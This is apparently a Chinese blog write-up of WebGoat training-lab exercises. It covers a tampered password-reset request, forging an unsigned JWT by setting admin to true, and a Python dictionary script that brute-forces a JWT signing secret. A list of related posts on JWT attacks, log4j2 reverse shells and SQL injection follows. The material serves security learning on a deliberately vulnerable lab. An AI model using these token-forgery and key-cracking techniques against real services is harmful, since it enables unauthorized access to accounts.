webgoat靶场复现
1、安装
github:发布 ·网站网格/网站网格 (github.com)
新手篇丨Web安全入门之WebGoat8.0环境搭建 - 知乎
Broken Authentication(身份验证)模块
0x02
newPassword111=aaaa&newPasswordConfirm222=aaa&userId=12309746
JWT tokens
0x04 Background Unverified Signature
转到 JWT 在线解密—LZL在线工具 (lzltool.cn) JWT Token在线解析解码 - ToolTT在线工具箱解码 jwt-token,然后将 admin 修改为 true 并使用以下脚本重新编码标头和有效负载,不添加签名部分,发送请求
jwt 安全参考:
http://4hou.win/wordpress/?p=23278
https://zhuanlan.zhihu.com/p/71672282
https://segmentfault.com/a/1190000010312468
0x05 jwt blasting
参考:https://www.freebuf.com/vuls/216457.html
在线验证:https://jwt.io/#debugger
实际上,只有几个与jwt相关的问题,只需尝试一下。这是暴力破解的密钥。github上有一个c语句版本的暴力破解软件,但它似乎一次尝试一个字符,所以它非常慢。反正我没有用完几次,几乎卡住了我的电脑。因此,我们可以使用 JWT 库自己编写脚本,也可以使用 github 上提供的脚本。这个python拆除脚本是基于字典的,所以首先你必须有一个强大的字典。我的字典不够强大,不足以让我几次不拆除,所以我只是去源头并翻出一些秘密密钥添加到我的字典中,"victory","business","available", "shipping", "washington"如下所示:
Blast脚本(您需要提供自己的字典):
import termcolor
import jwt
if __name__ == "__main__":jwt_str = R'eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTU3MjY4ODA3MSwiZXhwIjoxNTcyNjg4MTMxLCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.2n1lN_F-Pk8GXxw7nAneMt1C4ExfH7mVdtQF9nMKhVs'with open('/opt/burp/pass.txt') as f:for line in f:key_ = line.strip()try:jwt.decode(jwt_str, verify=True, key=key_)print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')breakexcept (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')breakexcept jwt.exceptions.InvalidSignatureError:print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)continueelse:print('\r', '\bsorry! no key be found.')
解密打不开 以后在做
参考:
Java代码审计入门:WebGoat8(再会) - FreeBuf网络安全行业门户
webgoat靶场复现相关推荐
- 渗透学习-靶场篇-WebGoat靶场(JWT攻击)
文章目录 前言 一.介绍JWT JWT令牌结构 获取的令牌的基本过程 二.攻击方式以及靶场的搭建 1.安装cWebGoat 2.空加密验证攻击 3.字典爆破 三.认证-键值逻辑 前言 本次主要学习了j ...
- webgoat靶场通关记录
webgoat靶场的所有的源码审计 以及详细解析 想要打靶场的可以看想要,学习java代码基础的也可以看看 github项目地址 https://github.com/wanan0red/webgoa ...
- 靶场复现————平行越权、垂直越权
知识学习,不能上升到现实,确对不能!!!! 什么是越权? 越权漏洞的概念 越权漏洞是一种很常见的逻辑安全漏洞.是由于服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致修改相关 ...
- JAVA代码审计之WebGoat靶场SQL注入
文章目录 前言 WebGoat IDEA部署靶场 No.1 回显注入 No.2 布尔盲注 No.3 Order by 代审技巧 SQL注入挖掘 SQL注入防御 Fortify体验 总结 前言 为了从自 ...
- WebGoat靶场搭建及通关记录(一)
文章目录 前言 一.搭建靶场 二.通关攻略 1.General HTTP Basics HTTP Proxies 2.Injection Flaws SQL Injection (advanced) ...
- log4j2-rce 靶场复现
log4j2是前几天一个核弹级的漏洞 现在公开的靶场有vulfocus.bugku http://vulfocus.fofa.so/#/dashboard https://ctf.bugku.com/ ...
- log4j2核弹级漏洞靶场复现(反弹shell)
环境搭建: 本次漏洞复现采用vulfocus的log4j2靶场docker 使用Kali系统进行复现实验 搭建docker拉取漏洞镜像可参考以下链接: https://blog.csdn.net/we ...
- Webgoat靶场搭建
环境 jdk16 安装 下载链接 :提取码:9999 下载过后是这个jdk-16.0.2.7z文件,这是个JDK16的包,进入bin目录下,可以看到靶场文件, 启动网站 打开一个cmd窗口执行启动网站 ...
- vulnstack(一) 红日靶场复现
说明:关于该复现中的问题欢迎vx交流:Bestboysendit 目录 一.环境配置: 二.内网getshell 3-(1)phpmyadmin 3-(2)备份文件: 三.内网-连接 1.基于MSF ...
最新文章
- ASP.NET 中的正则表达式
- 实验三:实现一个大素数生成算法
- Conficker蠕虫新动作 P2P更新5月份关闭
- 大规模异常滥用检测:基于局部敏感哈希算法——来自Uber Engineering的实践
- GitHub 近 100,000 程序员“起义”:向“996”开炮!
- C# ckeditor+ckfinder的图片上传配置
- LOOP WITH CONTROL 用法
- 快速排序算法c语言lomuto,快速排序(N.Lomuto版)
- java注解获取参数_JAVA 自定义注解及参数获取 | 学步园
- hdu4857 拓扑排序
- Latex初学者入门
- Javascript第六章prototype原型向构造器中添加属性,实现构造器共享,节约空间第五课
- 语音排队叫号系统源码
- 斗鱼直播间弹幕爬取2020年最新python
- SecureCRT 连接 DynamipsGUI创建的模拟路由器
- TAOCP-READING-1.3'-1
- 蓝牙电话/耳机和蓝牙音乐profile
- android平板评测,最火7吋Android平板 三星P1010全面评测
- 微信小程序音频的使用:wx.createInnerAudioContext的使用
- python金融数据分析及可视化